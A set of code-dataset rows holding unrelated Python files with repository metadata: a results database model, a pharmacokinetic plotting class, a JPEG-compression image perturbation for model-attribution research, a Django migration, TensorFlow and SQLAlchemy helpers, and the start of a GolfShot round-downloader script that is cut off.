] | 773 | 2020-01-04T22:54:01.000Z | 2022-03-31T16:07:56.000Z | backend/database/result.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 1 | 2021-12-25T14:32:25.000Z | 2021-12-25T14:32:25.000Z | from __future__ import annotations
from typing import Any, Dict, List, Literal, Optional, Union
from .event import Event
from .database import query, queryWithResult, queryWithResults
properties = [
"time",
"position",
"points",
"incomplete",
"event",
"competitor",
"type",
"course",
"id",
"name",
"ageClass",
"club",
"course",
"eventName",
]
| 28.149215 | 75 | 0.464894 | from __future__ import annotations
from typing import Any, Dict, List, Literal, Optional, Union
from .event import Event
from .database import query, queryWithResult, queryWithResults
properties = [
"time",
"position",
"points",
"incomplete",
"event",
"competitor",
"type",
"course",
"id",
"name",
"ageClass",
"club",
"course",
"eventName",
]
class Result:
id: int
time: int
position: Union[int, Literal[""]]
points: int
incomplete: bool
type: str
course: str
event: str
eventName: Optional[str]
competitor: int
# competitor data
name: Optional[str]
ageClass: Optional[str]
club: Optional[str]
def __init__(self, result):
if type(result) == dict:
for key in result:
setattr(self, key, result[key])
else:
for (index, value) in enumerate(result):
key = properties[index]
if not (hasattr(self, key) and getattr(self, key)):
setattr(self, key, value)
if type(self.incomplete) == str:
self.incomplete = self.incomplete == "true"
if self.position == -1:
self.position = ""
if not hasattr(self, "eventName"):
self.eventName = None
def toDictionary(self) -> Dict[str, Any]:
return {
"id": self.id,
"time": self.time,
"position": self.position,
"points": self.points,
"incomplete": self.incomplete,
"type": self.type,
"course": self.course,
"event": self.event,
"competitor": self.competitor,
"name": self.name,
"ageClass": self.ageClass,
"club": self.club,
"eventName": self.eventName,
"eventId": self.event,
}
def create(self) -> None:
if self.position == "":
self.position = -1
query(
"""
INSERT INTO results (
time,
position,
points,
incomplete,
event,
competitor,
type,
course
) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
""",
(
self.time,
self.position,
self.points,
self.incomplete,
self.event,
self.competitor,
self.type,
self.course,
),
)
@staticmethod
def updatePoints(resultId: int, points: int) -> None:
query(
"""
UPDATE results
SET points=%s
WHERE rowid=%s
""",
(points, resultId),
)
def updateIncomplete(self, incomplete: bool) -> None:
query(
"""
UPDATE results
SET incomplete=%s
WHERE rowid=%s
""",
(incomplete, self.id),
)
def updateType(self, type: str) -> None:
query(
"""
UPDATE results
SET type=%s
WHERE rowid=%s
""",
(type, self.id),
)
def getEvent(self) -> Optional[Event]:
if event := Event.getById(self.event):
return event
return None
@staticmethod
def getById(rowid: int) -> Result:
databaseResult = queryWithResult(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course
FROM competitors, results
WHERE
results.rowid=%s
AND results.competitor=competitors.rowid
""",
(rowid,),
)
return Result(databaseResult)
@staticmethod
def getByEvent(eventId: str) -> List[Result]:
databaseResult = queryWithResults(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course
FROM competitors, results
WHERE
results.competitor=competitors.rowid
AND event=%s
AND COALESCE(results.type, '') <> 'hidden'
ORDER BY results.course ASC, results.position ASC
""",
(eventId,),
)
return [Result(result) for result in databaseResult]
@staticmethod
def getDynamicResultsByLeague(league: str) -> List[Result]:
databaseResult = queryWithResults(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course
FROM competitors, results
WHERE
results.competitor=competitors.rowid
AND competitors.league=%s
AND COALESCE(results.type, '') <> 'hidden'
AND results.type IS NOT NULL
ORDER BY competitors.course ASC, results.position ASC
""",
(league,),
)
return [Result(result) for result in databaseResult]
@staticmethod
def getByCompetitor(competitor: int) -> List[Result]:
databaseResult = queryWithResults(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course,
events.name
FROM competitors, results, events
WHERE
results.competitor=competitors.rowid
AND results.event=events.id
AND competitor=%s
AND COALESCE(results.type, '') <> 'hidden'
ORDER BY events.date ASC
""",
(competitor,),
)
return [Result(result) for result in databaseResult]
@staticmethod
def getNonDynamicPointsByCompetitor(competitor: int) -> List[int]:
result = queryWithResult(
"""
SELECT string_agg(results.points::text,';')
FROM results, competitors
WHERE
results.competitor=competitors.rowid
AND COALESCE(type,'') <> 'max'
AND COALESCE(type,'') <> 'average'
AND COALESCE(type,'') <> 'manual'
AND COALESCE(type,'') <> 'hidden'
AND competitors.rowid=%s
GROUP BY competitors.rowid
""",
(competitor,),
)
return [int(result) for result in result[0].split(";")]
@staticmethod
def getAll() -> List[Result]:
databaseResult = queryWithResults(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course
FROM competitors, results
WHERE
results.competitor=competitors.rowid
AND COALESCE(results.type, '') <> 'hidden'
"""
)
return [Result(result) for result in databaseResult]
@staticmethod
def getByEventForRecalc(eventId: str) -> List[Dict[str, Any]]:
databaseResult = queryWithResults(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course
FROM competitors, results
WHERE
results.competitor=competitors.rowid
AND event=%s
AND COALESCE(type, '') <> 'manual'
AND COALESCE(type, '') <> 'max'
AND COALESCE(type, '') <> 'average'
ORDER BY results.course ASC, results.time ASC
""",
(eventId,),
)
return [Result(result).toDictionary() for result in databaseResult]
@staticmethod
def updateFromRecalc(data: Dict[str, Any]) -> None:
query(
"""
UPDATE results
SET
time=%s,
position=%s,
points=%s,
incomplete=%s
WHERE rowid=%s
""",
(
data["time"],
data["position"],
data["points"],
data["incomplete"],
data["id"],
),
)
@staticmethod
def transfer(competitor: int, result: int) -> None:
query(
"""
UPDATE results
SET competitor=%s
WHERE rowid=%s
""",
(competitor, result),
)
@staticmethod
def deleteByEvent(eventId: str) -> None:
query(
"""
DELETE FROM results
WHERE event=%s
""",
(eventId,),
)
| 9,384 | 944 | 23 |
4c974887fd1b1b9962ef96e605440ab8067fc6be | 2,952 | py | Python | plotdev.py | SABSR3-Group-2/PKLibaryGroup2 | 99b065e75aed0a5e640f218455b9c9e452613fa6 | [
"MIT"
] | null | null | null | plotdev.py | SABSR3-Group-2/PKLibaryGroup2 | 99b065e75aed0a5e640f218455b9c9e452613fa6 | [
"MIT"
] | 11 | 2020-10-21T13:41:53.000Z | 2020-10-28T10:16:56.000Z | plotdev.py | SABSR3-Group-2/PKLibaryGroup2 | 99b065e75aed0a5e640f218455b9c9e452613fa6 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# solveData = pd.DataFrame(data = [[1,2,4,8,16,32,64,128],[1,1,2,3,4,3,2,1]], columns=[0,1,2,3,4,5,6,7])
# solveData = solveData.transpose()
# a = [[1,2,3,4],[4,3,2,1,2,3,4,3,2,1]]
# #b= np.array(a)
# c = np.array(a).T
# newData = pd.DataFrame(data = a, columns=[1,2,3,3.5,4,5,6,7,8,9])
# newData = newData.transpose()
# currentData = solveData
# currentData
# currentData = pd.concat([currentData, newData], axis=1, sort=False)
# fig = plt.figure()
# fig.suptitle("pk model")
# ax = fig.add_subplot(1,1,1)
# ax.set_xlabel("Time"+__unitsFormat("s"))
# ax.set_ylabel("Volume"+__unitsFormat("mg"))
# plt.plot(currentData)
# plt.show()
# #def updateData(solveData, newdata)
graph = plot()
graph.adddata([100,50,25,12,6,3,1,0.5],[0,2,3,4,5,6,7,9])
graph.adddata([[1,2,3,5,8,13,21],[15,4,3,2,1,2,3]],[1,2,3,4,5,6,7])
| 25.230769 | 104 | 0.602304 | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def __unitsFormat(unitsInput):
if unitsInput != "":
unitsOutput = " ("+unitsInput+")"
else:
unitsOutput = unitsInput
return unitsOutput
# solveData = pd.DataFrame(data = [[1,2,4,8,16,32,64,128],[1,1,2,3,4,3,2,1]], columns=[0,1,2,3,4,5,6,7])
# solveData = solveData.transpose()
# a = [[1,2,3,4],[4,3,2,1,2,3,4,3,2,1]]
# #b= np.array(a)
# c = np.array(a).T
# newData = pd.DataFrame(data = a, columns=[1,2,3,3.5,4,5,6,7,8,9])
# newData = newData.transpose()
# currentData = solveData
# currentData
# currentData = pd.concat([currentData, newData], axis=1, sort=False)
# fig = plt.figure()
# fig.suptitle("pk model")
# ax = fig.add_subplot(1,1,1)
# ax.set_xlabel("Time"+__unitsFormat("s"))
# ax.set_ylabel("Volume"+__unitsFormat("mg"))
# plt.plot(currentData)
# plt.show()
# #def updateData(solveData, newdata)
class plot():
def __init__(self, masses=[],times=[]):
solveData = pd.DataFrame(data = masses, columns=times)
self.currentData = solveData.transpose()
def adddata (self,newData=[], newtimeseries=[]):
newData = np.array(newData)
if len(newData.shape) == 1:
newData = pd.DataFrame(data = [newData], columns=newtimeseries)
else:
newData = pd.DataFrame(data = newData, columns=newtimeseries)
newData = newData.transpose()
self.currentData = pd.concat([self.currentData, newData], axis=1, sort=False)
self.show()
def show(self):
self.setupFig()
self.fig = plt.plot(self.currentData)
plt.show()
def setupFig(self, title="PK Model", xunits="",yunits=""):
"""establishes a matplotlib figure to hold the graph displaying the results of the PK model
:param title: Title displayed above graph, defaults to "PK Model"
:type title: string, optional
:param xunits: units for time on the axis, defaults to ""
:type xunits: string, optional
:param yunits: units for mass of the drug administered, defaults to ""
:type yunits: string, optional
...
:raises [ErrorType]: [ErrorDescription]
...
:return: matplotlib figure
:rtype: class 'matplotlib.figure.Figure'
"""
self.fig = plt.figure()
self.fig.suptitle(title)
ax = self.fig.add_subplot(1,1,1)
ax.set_xlabel("Time"+self.__unitsFormat(xunits))
ax.set_ylabel("Volume"+self.__unitsFormat(yunits))
return self.fig
def __unitsFormat(self, unitsInput):
if unitsInput != "":
unitsOutput = " ("+unitsInput+")"
else:
unitsOutput = unitsInput
return unitsOutput
graph = plot()
graph.adddata([100,50,25,12,6,3,1,0.5],[0,2,3,4,5,6,7,9])
graph.adddata([[1,2,3,5,8,13,21],[15,4,3,2,1,2,3]],[1,2,3,4,5,6,7])
| 937 | 1,039 | 46 |
52b2b8048d01ad33751970a0ccba10527e01ab2d | 7,194 | py | Python | attack_methods/Jpeg_compression.py | ASU-Active-Perception-Group/decentralized_attribution_of_generative_models | b57c38b215cff4df24744262ffa02d41c61151ac | [
"MIT"
] | 3 | 2021-03-19T08:34:57.000Z | 2021-03-20T04:06:43.000Z | attack_methods/Jpeg_compression.py | ASU-Active-Perception-Group/decentralized_attribution_of_generative_models | b57c38b215cff4df24744262ffa02d41c61151ac | [
"MIT"
] | null | null | null | attack_methods/Jpeg_compression.py | ASU-Active-Perception-Group/decentralized_attribution_of_generative_models | b57c38b215cff4df24744262ffa02d41c61151ac | [
"MIT"
] | null | null | null | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
# def zigzag_indices(shape: (int, int), count):
# x_range, y_range = shape
# index_order = sorted(((x, y) for x in range(x_range) for y in range(y_range)),
# key=lambda p: (p[0] + p[1], -p[1] if (p[0] + p[1]) % 2 else p[1]))
#
# mask = np.zeros(shape)
# for r, c in index_order[:count]:
# mask[r,c] = 1
#
# return mask
def rgb2yuv(image_rgb, image_yuv_out):
""" Transform the image from rgb to yuv """
image_yuv_out[:, 0, :, :] = 0.299 * image_rgb[:, 0, :, :].clone() + 0.587 * image_rgb[:, 1, :, :].clone() + 0.114 * image_rgb[:, 2, :, :].clone()
image_yuv_out[:, 1, :, :] = -0.14713 * image_rgb[:, 0, :, :].clone() + -0.28886 * image_rgb[:, 1, :, :].clone() + 0.436 * image_rgb[:, 2, :, :].clone()
image_yuv_out[:, 2, :, :] = 0.615 * image_rgb[:, 0, :, :].clone() + -0.51499 * image_rgb[:, 1, :, :].clone() + -0.10001 * image_rgb[:, 2, :, :].clone()
def yuv2rgb(image_yuv, image_rgb_out):
""" Transform the image from yuv to rgb """
image_rgb_out[:, 0, :, :] = image_yuv[:, 0, :, :].clone() + 1.13983 * image_yuv[:, 2, :, :].clone()
image_rgb_out[:, 1, :, :] = image_yuv[:, 0, :, :].clone() + -0.39465 * image_yuv[:, 1, :, :].clone() + -0.58060 * image_yuv[:, 2, :, :].clone()
image_rgb_out[:, 2, :, :] = image_yuv[:, 0, :, :].clone() + 2.03211 * image_yuv[:, 1, :, :].clone()
| 43.077844 | 155 | 0.578121 | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def gen_filters(size_x: int, size_y: int, dct_or_idct_fun: callable) -> np.ndarray:
tile_size_x = 8
filters = np.zeros((size_x * size_y, size_x, size_y))
for k_y in range(size_y):
for k_x in range(size_x):
for n_y in range(size_y):
for n_x in range(size_x):
filters[k_y * tile_size_x + k_x, n_y, n_x] = dct_or_idct_fun(n_y, k_y, size_y) * dct_or_idct_fun(n_x,
k_x,
size_x)
return filters
# def zigzag_indices(shape: (int, int), count):
# x_range, y_range = shape
# index_order = sorted(((x, y) for x in range(x_range) for y in range(y_range)),
# key=lambda p: (p[0] + p[1], -p[1] if (p[0] + p[1]) % 2 else p[1]))
#
# mask = np.zeros(shape)
# for r, c in index_order[:count]:
# mask[r,c] = 1
#
# return mask
def get_jpeg_yuv_filter_mask(image_shape: tuple, window_size: int, keep_count: int):
mask = np.zeros((window_size, window_size), dtype=np.uint8)
index_order = sorted(((x, y) for x in range(window_size) for y in range(window_size)),
key=lambda p: (p[0] + p[1], -p[1] if (p[0] + p[1]) % 2 else p[1]))
for i, j in index_order[0:keep_count]:
mask[i, j] = 1
return np.tile(mask, (int(np.ceil(image_shape[0] / window_size)),
int(np.ceil(image_shape[1] / window_size))))[0: image_shape[0], 0: image_shape[1]]
def dct_coeff(n, k, N):
return np.cos(np.pi / N * (n + 1. / 2.) * k)
def idct_coeff(n, k, N):
return (int(0 == n) * (- 1 / 2) + np.cos(
np.pi / N * (k + 1. / 2.) * n)) * np.sqrt(1 / (2. * N))
def rgb2yuv(image_rgb, image_yuv_out):
""" Transform the image from rgb to yuv """
image_yuv_out[:, 0, :, :] = 0.299 * image_rgb[:, 0, :, :].clone() + 0.587 * image_rgb[:, 1, :, :].clone() + 0.114 * image_rgb[:, 2, :, :].clone()
image_yuv_out[:, 1, :, :] = -0.14713 * image_rgb[:, 0, :, :].clone() + -0.28886 * image_rgb[:, 1, :, :].clone() + 0.436 * image_rgb[:, 2, :, :].clone()
image_yuv_out[:, 2, :, :] = 0.615 * image_rgb[:, 0, :, :].clone() + -0.51499 * image_rgb[:, 1, :, :].clone() + -0.10001 * image_rgb[:, 2, :, :].clone()
def yuv2rgb(image_yuv, image_rgb_out):
""" Transform the image from yuv to rgb """
image_rgb_out[:, 0, :, :] = image_yuv[:, 0, :, :].clone() + 1.13983 * image_yuv[:, 2, :, :].clone()
image_rgb_out[:, 1, :, :] = image_yuv[:, 0, :, :].clone() + -0.39465 * image_yuv[:, 1, :, :].clone() + -0.58060 * image_yuv[:, 2, :, :].clone()
image_rgb_out[:, 2, :, :] = image_yuv[:, 0, :, :].clone() + 2.03211 * image_yuv[:, 1, :, :].clone()
class JpegCompression(nn.Module):
def __init__(self, device, yuv_keep_weights = (25, 9, 9)):
super(JpegCompression, self).__init__()
self.device = device
self.dct_conv_weights = torch.tensor(gen_filters(8, 8, dct_coeff), dtype=torch.float32).to(self.device)
self.dct_conv_weights.unsqueeze_(1)
self.idct_conv_weights = torch.tensor(gen_filters(8, 8, idct_coeff), dtype=torch.float32).to(self.device)
self.idct_conv_weights.unsqueeze_(1)
self.yuv_keep_weighs = yuv_keep_weights
self.keep_coeff_masks = []
self.jpeg_mask = None
# create a new large mask which we can use by slicing for images which are smaller
self.create_mask((1000, 1000))
def create_mask(self, requested_shape):
if self.jpeg_mask is None or requested_shape > self.jpeg_mask.shape[1:]:
self.jpeg_mask = torch.empty((3,) + requested_shape, device=self.device)
for channel, weights_to_keep in enumerate(self.yuv_keep_weighs):
mask = torch.from_numpy(get_jpeg_yuv_filter_mask(requested_shape, 8, weights_to_keep))
self.jpeg_mask[channel] = mask
def get_mask(self, image_shape):
if self.jpeg_mask.shape < image_shape:
self.create_mask(image_shape)
# return the correct slice of it
return self.jpeg_mask[:, :image_shape[1], :image_shape[2]].clone()
def apply_conv(self, image, filter_type: str):
if filter_type == 'dct':
filters = self.dct_conv_weights
elif filter_type == 'idct':
filters = self.idct_conv_weights
else:
raise('Unknown filter_type value.')
image_conv_channels = []
for channel in range(image.shape[1]):
image_yuv_ch = image[:, channel, :, :].unsqueeze_(1)
image_conv = F.conv2d(image_yuv_ch, filters, stride=8)
image_conv = image_conv.permute(0, 2, 3, 1)
image_conv = image_conv.view(image_conv.shape[0], image_conv.shape[1], image_conv.shape[2], 8, 8)
image_conv = image_conv.permute(0, 1, 3, 2, 4)
image_conv = image_conv.contiguous().view(image_conv.shape[0],
image_conv.shape[1]*image_conv.shape[2],
image_conv.shape[3]*image_conv.shape[4])
image_conv.unsqueeze_(1)
# image_conv = F.conv2d()
image_conv_channels.append(image_conv)
image_conv_stacked = torch.cat(image_conv_channels, dim=1)
return image_conv_stacked
def forward(self, noised_and_cover):
if(noised_and_cover.size()[1] == 1): #if given image has gray scale image,
noised_and_cover = noised_and_cover.repeat(1,3,1,1) #just copy gray scale to RGB by copying
#import torchvision.utils as vutils
#vutils.save_image(noised_and_cover,
# './gray_to_rgb.png', normalize=True, scale_each=True,
# range=(-1, 1))
noised_image = noised_and_cover
# pad the image so that we can do dct on 8x8 blocks
pad_height = (8 - noised_image.shape[2] % 8) % 8
pad_width = (8 - noised_image.shape[3] % 8) % 8
noised_image = nn.ZeroPad2d((0, pad_width, 0, pad_height))(noised_image)
# convert to yuv
image_yuv = torch.empty_like(noised_image)
rgb2yuv(noised_image, image_yuv)
assert image_yuv.shape[2] % 8 == 0
assert image_yuv.shape[3] % 8 == 0
# apply dct
image_dct = self.apply_conv(image_yuv, 'dct')
# get the jpeg-compression mask
mask = self.get_mask(image_dct.shape[1:])
# multiply the dct-ed image with the mask.
image_dct_mask = torch.mul(image_dct, mask)
# apply inverse dct (idct)
image_idct = self.apply_conv(image_dct_mask, 'idct')
# transform from yuv to to rgb
image_ret_padded = torch.empty_like(image_dct)
yuv2rgb(image_idct, image_ret_padded)
# un-pad
noised_and_cover = image_ret_padded[:, :, :image_ret_padded.shape[2]-pad_height, :image_ret_padded.shape[3]-pad_width].clone()
return noised_and_cover | 5,473 | 12 | 249 |
ffedf602d2f9c7fa1d071765a091d64c3cb50e73 | 413 | py | Python | session/migrations/0006_auto_20190415_1247.py | tonymontaro/mentorci_server | 527885a38da60e80698624309f99455e0c8b1192 | [
"MIT"
] | 2 | 2019-07-11T09:46:11.000Z | 2020-02-14T19:47:30.000Z | session/migrations/0006_auto_20190415_1247.py | tonymontaro/mentorci_server | 527885a38da60e80698624309f99455e0c8b1192 | [
"MIT"
] | 14 | 2019-07-05T08:52:17.000Z | 2022-02-10T08:25:03.000Z | session/migrations/0006_auto_20190415_1247.py | tonymontaro/mentorci_server | 527885a38da60e80698624309f99455e0c8b1192 | [
"MIT"
] | 2 | 2019-07-11T09:46:14.000Z | 2020-02-14T20:57:55.000Z | # Generated by Django 2.2 on 2019-04-15 12:47
from django.db import migrations, models
| 21.736842 | 74 | 0.607748 | # Generated by Django 2.2 on 2019-04-15 12:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('session', '0005_auto_20190415_0524'),
]
operations = [
migrations.AlterField(
model_name='sessionlog',
name='concern',
field=models.TextField(default='', max_length=500, null=True),
),
]
| 0 | 301 | 23 |
2020c53b7f2ac02ac70f17066db5bac7ae6d6bf8 | 2,643 | py | Python | trend/src/zutils/tensorflow/tf_store.py | limingmax/WFCode | f2e6d2fcf05ad9fdaac3a69603afee047ed37ca3 | [
"Apache-2.0"
] | 2 | 2018-10-23T01:56:46.000Z | 2018-10-23T01:56:49.000Z | trend/src/zutils/tensorflow/tf_store.py | limingmax/WFCode | f2e6d2fcf05ad9fdaac3a69603afee047ed37ca3 | [
"Apache-2.0"
] | null | null | null | trend/src/zutils/tensorflow/tf_store.py | limingmax/WFCode | f2e6d2fcf05ad9fdaac3a69603afee047ed37ca3 | [
"Apache-2.0"
] | null | null | null | # @Time : 2018-9-10
# @Author : zxh
import os
import tensorflow as tf
import sys
from zutils.utils import relative_project_path
| 39.447761 | 99 | 0.67045 | # @Time : 2018-9-10
# @Author : zxh
import os
import tensorflow as tf
import sys
from zutils.utils import relative_project_path
class TFStore:
def __init__(self, sess, model_name, net_name, max_to_keep=500):
self.sess = sess
self.model_name= model_name
self.net_name = net_name
self.saver = tf.train.Saver(max_to_keep=0)
def relative_model_dir_path(self, *paths):
return relative_project_path('models', self.model_name, self.net_name, *paths)
def load_model(self, step):
if not os.path.isfile(self.relative_model_dir_path(str(step), 'model.meta')):
raise Exception('model is not exist')
self.saver.restore(self.sess, self.relative_model_dir_path(str(step), 'model'))
print('restore model succeed, path:', self.relative_model_dir_path(str(step), 'model'))
def init_model(self):
tf.global_variables_initializer().run()
print('init model succeed')
def load_or_init_model(self, step):
if os.path.isfile(self.relative_model_dir_path(str(step), 'model.meta')):
self.saver.restore(self.sess, self.relative_model_dir_path(str(step), 'model'))
print('restore model succeed, path:', self.relative_model_dir_path(str(step), 'model'))
else:
tf.global_variables_initializer().run()
print('init model succeed')
def save_model(self, save_cur_step, save_0_step):
with tf.variable_scope(self.model_name, reuse=True):
step = tf.get_variable('train_step', shape=(), dtype=tf.int32).eval()
if save_cur_step:
os.makedirs(self.relative_model_dir_path(str(step)), exist_ok=True)
self.saver.save(self.sess, self.relative_model_dir_path(str(step), 'model'))
print('save model succeed, step:', step)
if save_0_step:
step = 0
os.makedirs(self.relative_model_dir_path(str(step)), exist_ok=True)
self.saver.save(self.sess, self.relative_model_dir_path(str(step), 'model'))
print('save model succeed, step:', step)
def create_tensorboard_write(self):
tensorboard_path = self.relative_model_dir_path('tensorboard')
os.makedirs(tensorboard_path, exist_ok=True)
return tf.summary.FileWriter(tensorboard_path, self.sess.graph)
def check_close_file(self):
return os.path.isfile(self.relative_model_dir_path('close'))
def remove_close_file(self):
if os.path.isfile(self.relative_model_dir_path('close')):
os.remove(self.relative_model_dir_path('close'))
return True
return False
| 2,250 | -7 | 265 |
72bc8a1878b0d62c89218738d3dca18323b62324 | 5,997 | py | Python | otter/database/model.py | pathob/odoo-otter | 1bf5dbab3c3ef12a12cae604d82d4e6f855f37fc | [
"Apache-2.0"
] | null | null | null | otter/database/model.py | pathob/odoo-otter | 1bf5dbab3c3ef12a12cae604d82d4e6f855f37fc | [
"Apache-2.0"
] | 1 | 2022-01-10T15:05:53.000Z | 2022-01-10T15:05:53.000Z | otter/database/model.py | pathob/odoo-otter | 1bf5dbab3c3ef12a12cae604d82d4e6f855f37fc | [
"Apache-2.0"
] | null | null | null | # based on https://realpython.com/python-sqlite-sqlalchemy/#using-flat-files-for-data-storage
from datetime import datetime
import sqlalchemy
from sqlalchemy import Column, String, Boolean, Integer, Float, Date, DateTime, ForeignKey, select, func, cast
from sqlalchemy.exc import NoResultFound
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship, backref, object_session
from otter.database import engine
# from otter.database import session as sess
from otter.util.cli import project_task_abbrev
from otter.util.date import datetime_to_time_string, date_string_to_date
Base = declarative_base()
# cached Odoo objects
# class BaseMixin(Base):
# @classmethod
# def create(cls, **kw):
# obj = cls(**kw)
# # TODO: That's so ugly
# session = sess()
# session.add(obj)
# session.commit()
# Otter objects
Base.metadata.create_all(engine())
| 30.135678 | 113 | 0.629148 | # based on https://realpython.com/python-sqlite-sqlalchemy/#using-flat-files-for-data-storage
from datetime import datetime
import sqlalchemy
from sqlalchemy import Column, String, Boolean, Integer, Float, Date, DateTime, ForeignKey, select, func, cast
from sqlalchemy.exc import NoResultFound
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship, backref, object_session
from otter.database import engine
# from otter.database import session as sess
from otter.util.cli import project_task_abbrev
from otter.util.date import datetime_to_time_string, date_string_to_date
Base = declarative_base()
# cached Odoo objects
# class BaseMixin(Base):
# @classmethod
# def create(cls, **kw):
# obj = cls(**kw)
# # TODO: That's so ugly
# session = sess()
# session.add(obj)
# session.commit()
class Project(Base):
__tablename__ = "project"
odoo_id = Column(Integer, primary_key=True, autoincrement=False)
name = Column(String)
active = Column(Boolean)
project_tasks = relationship("ProjectTask", backref=backref("project"))
@classmethod
def from_odoo_json(cls, json):
return cls(
odoo_id=json['id'],
name=json['name'],
active=json['active']
)
class ProjectTask(Base):
__tablename__ = "project_task"
odoo_id = Column(Integer, primary_key=True, autoincrement=False)
name = Column(String)
active = Column(Boolean)
project_id = Column(Integer, ForeignKey("project.odoo_id"))
records = relationship("Record", backref=backref("project_task"))
@classmethod
def from_odoo_json(cls, json):
return cls(
odoo_id=json['id'],
name=json['name'],
active=json['active'],
project_id=json['project_id'][0]
)
class Record(Base):
__tablename__ = "record"
id = Column(Integer, primary_key=True, autoincrement=True)
odoo_id = Column(Integer, unique=True)
date = Column(Date, nullable=False)
name = Column(String)
unit_amount = Column(Float)
project_task_id = Column(Integer, ForeignKey("project_task.odoo_id"))
record_track_items = relationship("RecordTrackItem", backref=backref("record"),
cascade="all, delete, delete-orphan")
record_time_slices = relationship("RecordTimeSlice", backref=backref("record"),
cascade="all, delete, delete-orphan")
def __repr__(self):
hh_mm = f"[{self.duration_str}]"
return (
f"{hh_mm} {self.project_task_abbrev(len(hh_mm)+1)}\n" +
f" {self.description}"
)
@classmethod
def get_id_by_odoo_id(cls, odoo_id, session):
try:
record_id, = session.query(Record.id).filter_by(odoo_id=odoo_id).one()
return record_id
except NoResultFound:
return None
@classmethod
def from_odoo_json(cls, local_id, json):
return cls(
id=local_id,
odoo_id=json['id'],
date=date_string_to_date(json['date']),
name=json['name'],
unit_amount=json['unit_amount'],
project_task_id=json['task_id'][0]
)
@property
def duration(self):
if self.unit_amount is not None:
return self.unit_amount
duration = (
object_session(self)
.scalar(
select(func.sum((
cast(func.coalesce(func.julianday(RecordTimeSlice.time_stop), func.julianday(datetime.now()))
- func.julianday(RecordTimeSlice.time_start), sqlalchemy.Float) * 24
)))
.where(RecordTimeSlice.record_id == self.id)
)
)
if duration is not None:
return duration
return 0
@property
def duration_str(self):
if self.duration is not None:
h, m = divmod(round(self.duration * 60), 60)
return f"{h:02d}:{m:02d}"
return None
@property
def description(self):
if self.name is not None:
return self.name
return (
object_session(self)
.scalar(
select(func.group_concat(RecordTrackItem.name, ', '))
.where(RecordTrackItem.record_id == self.id)
)
)
@property
def project_id(self):
return self.project_task.project_id
@property
def project_name(self):
return self.project_task.project.name
@property
def project_task_name(self):
return self.project_task.name
def project_task_abbrev(self, offset_length=0):
return project_task_abbrev(self.project_name, self.project_task_name, offset_length)
def odoo_create_json(self):
return {
'date': self.date,
'project_id': self.project_id,
'task_id': self.project_task_id,
'duration': self.unit_amount,
'names': self.name
}
# Otter objects
class RecordTrackItem(Base):
__tablename__ = "record_track_item"
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, nullable=False)
record_id = Column(Integer, ForeignKey("record.id"), nullable=False)
class RecordTimeSlice(Base):
__tablename__ = "record_time_slice"
id = Column(Integer, primary_key=True, autoincrement=True)
# the start time may never be null while the stop time is null until it the work got stopped
time_start = Column(DateTime, nullable=False)
time_stop = Column(DateTime, nullable=True)
record_id = Column(Integer, ForeignKey("record.id"), nullable=False)
@property
def time_start_str(self):
return datetime_to_time_string(self.time_start)
@property
def time_stop_str(self):
return datetime_to_time_string(self.time_stop)
Base.metadata.create_all(engine())
| 2,597 | 2,343 | 115 |
f17683f3d27673d7aef5f527130d3c6b329fd12a | 3,553 | py | Python | golfshot-downloader.py | tinman6/golfshot-downloader | c5093c670a673fc0ee26fd0dceb9bba0c7675ad2 | [
"MIT"
] | null | null | null | golfshot-downloader.py | tinman6/golfshot-downloader | c5093c670a673fc0ee26fd0dceb9bba0c7675ad2 | [
"MIT"
] | null | null | null | golfshot-downloader.py | tinman6/golfshot-downloader | c5093c670a673fc0ee26fd0dceb9bba0c7675ad2 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import argparse
from bs4 import BeautifulSoup
from html.parser import HTMLParser
from lxml import etree
import json
import re
import requests
GOLFSHOT_URL = 'https://play.golfshot.com'
parser = argparse.ArgumentParser(description='Download GolfShot data')
parser.add_argument('username', help='Username for GolfShot account')
parser.add_argument('password', help='Password for GolfShot account')
parser.add_argument('profile_id', help='Profile ID for GolfShot account')
parser.add_argument('--until', help='Download rounds until specified round (by descending date)')
args = parser.parse_args()
with requests.Session() as session:
tokenRequest = session.get(f'{GOLFSHOT_URL}/signin')
parser = etree.HTMLParser()
tree = etree.fromstring(tokenRequest.text, parser)
verificationToken = tree.xpath('//form//input[@name="__RequestVerificationToken"]/@value')[0]
signin = session.post(f'{GOLFSHOT_URL}/signin',
data={'Email': args.username,
'Password': args.password,
'__RequestVerificationToken': verificationToken,
})
download_rounds(session, args.profile_id, args.until)
| 33.838095 | 160 | 0.687025 | #!/usr/bin/python
import argparse
from bs4 import BeautifulSoup
from html.parser import HTMLParser
from lxml import etree
import json
import re
import requests
GOLFSHOT_URL = 'https://play.golfshot.com'
class RoundParser(HTMLParser):
def handle_data(self, data):
# the golfshot model is available in a script block
if 'Golfshot.Applications.Scorecard' in data:
